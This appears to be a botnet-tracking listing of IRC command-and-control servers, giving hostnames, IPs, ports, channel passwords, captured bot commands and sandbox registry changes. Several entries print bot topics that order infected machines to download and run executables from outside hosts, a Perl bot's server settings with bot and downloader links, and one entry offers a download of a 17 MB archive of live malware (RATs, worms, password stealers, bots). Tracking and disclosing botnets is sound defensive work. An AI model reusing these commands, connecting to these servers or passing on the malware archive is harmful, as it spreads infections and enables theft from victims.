jjjjjj.ahrampress.net ip: 123.183.217.32 jjjjjj.ahrampress.net:6943 123.183.217.32 5943 123.183.217.32 6943 PASSWORD: eee Nick [N00_USA_XP_39922187] rssr SP2-917 * 0 :COMPUTERNAME Now talking in #j Channel: #j Topic is ‘.r.getfile -S|.r.getfile http://61.136.59.34/LWC/img/mheader.png C:radr.exe 1|.asc -S|.http http://61.136.59.34/LWC/dc0.exe|.asc exp_all 25 5 0 -a -r -e|.asc exp_all 25 5 0 -b -r -e|.asc exp_all 20 5 0 -b|.asc exp_all 20 5 0Read more...
dc.drwhox.com(botnet hosted in China Beijing Chinanet Hebei Province Network)
Remote Host Port Number 112.78.112.208 80 218.85.133.201 80 61.136.59.34 80 123.183.217.32 5943 123.183.217.32 6943 27.54.225.102 6943 PRIVMSG #dc1 :Err0r.. MODE [N00_USA_XP_7890652] @ -ix 00000030 | 5F36 3033 3038 3139 5D18 E740 0D0A 7365 | _6030819]..@..se 00000040 | 6E64 2023 6A2C 234D 6120 6F6F 6F6F 0D0A | nd #j,#Ma oooo.. 00000050 | 5052 5256 4D53 4720Read more...
irc.racrew.info(linux perl bots hosted in United States Arkadelphia Ezclick.net Inc)
irc conection: $servidor=’75.46.208.5′ unless $servidor; my $porta=’9191′; Channels: 5 channels formed Clients: I have 103 clients and 0 servers Local users: Current Local Users: 103 Max: 143 Global users: Current Global Users: 103 Max: 417 bot link : http://80.73.145.20/seguridad/c.txt downloader link: http://80.73.145.20/seguridad/ec.txt? rabot.txt: http://80.73.145.20/seguridad/rabot.txt infos about hosting: http://whois.domaintools.com/75.46.208.5
70.39.71.240(botnet hosted in United States Missoula Sharktech Internet Services)
Remote Host Port Number 70.39.71.240 51987 NICK {New}[USA-1244024-XP] USER 8408605 “” “lol” :8408605 JOIN ##Crysis Registry Modifications * The newly created Registry Value is: o [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun] + winlog = “%Temp%lsass.exe” so that lsass.exe runs every time Windows starts Memory Modifications * There was a new process created in the system: Process Name Process Filename MainRead more...
17mb exe files from diferent malwares
inside the rar u have diferent malwares like rats,worms,passwd stealers,bots;mass emailers etc Download: http://81878971.filesonthe.net
play.mygreatbar.com( bfbot hosted in China Tianjin Longchishenzhou-ltd)
play.mygreatbar.com: type A, class IN, addr 61.136.59.34 UDP Protocol Dest IP:61.136.59.34 Dest Port:1863 exe file here: http://91.217.162.104/m.exe infos about hosting: http://whois.domaintools.com/61.136.59.34
java.KUTLUFAMILY.COM(update)
Remote Host Port Number 178.211.56.102 80 66.90.103.116 80 178.211.56.105 81 PASS sexy Resolved : [java.KUTLUFAMILY.COM] To [178.211.56.105] Resolved : [java.KUTLUFAMILY.COM] To [178.211.56.104] NICK cqdrrkewtnvc USER gazulycxeqrd “” “qzr” :gazulycxeqrd JOIN #3 PONG :irc.dal.net NICK [N00_USA_XP_7237251]` USER SP2-891 * 0 :COMPUTERNAME Now talking in #3 Topic On: [ #3 ] [ .flushdns |.down -S |.update -SRead more...
oxxo.seremonymt2.com(botnet hosted in United Kingdom London Rapidswitch Ltd)
oxxo.seremonymt2.com:6667 Channels : #ox – #x1 – #x2 -#x3 -#x4 -#x5 -#x6 -#x7 Topic On: [ #ox 12] [ 13 .download http://www.brosmt2.com/hacked/x2.exe c:windowsx2.exe 1 ] Topic By: [ HackWolf ] Modes On: [ #ox ] [ +mntMu ] infos about hosting: http://whois.domaintools.com/95.154.227.177
sohbet.az(botnet hosted in Germany Hetzner Online Ag)
Remote Host Port Number 173.192.225.170 80 64.211.162.99 80 67.202.66.171 80 67.202.66.203 80 67.202.94.86 80 75.126.182.189 80 95.168.183.188 80 178.63.104.143 6667 NICK USA|51200 USER svkhl 0 0 :USA|51200 JOIN #Dos! USERHOST USA|51200 MODE USA|51200 -x+i PRIVMSG #Dos! :- shell – File opened: www.siber.gen.tr Registry Modifications * The following Registry Key was created: o HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunServices * TheRead more...
dalga.co.cc(botnet hosted in United Kingdom London Idealhosting Managed Servers)
dalga.co.cc:6667 chanels:#xp,#spam,#infected,#x infos about hosting: http://whois.domaintools.com/95.154.237.228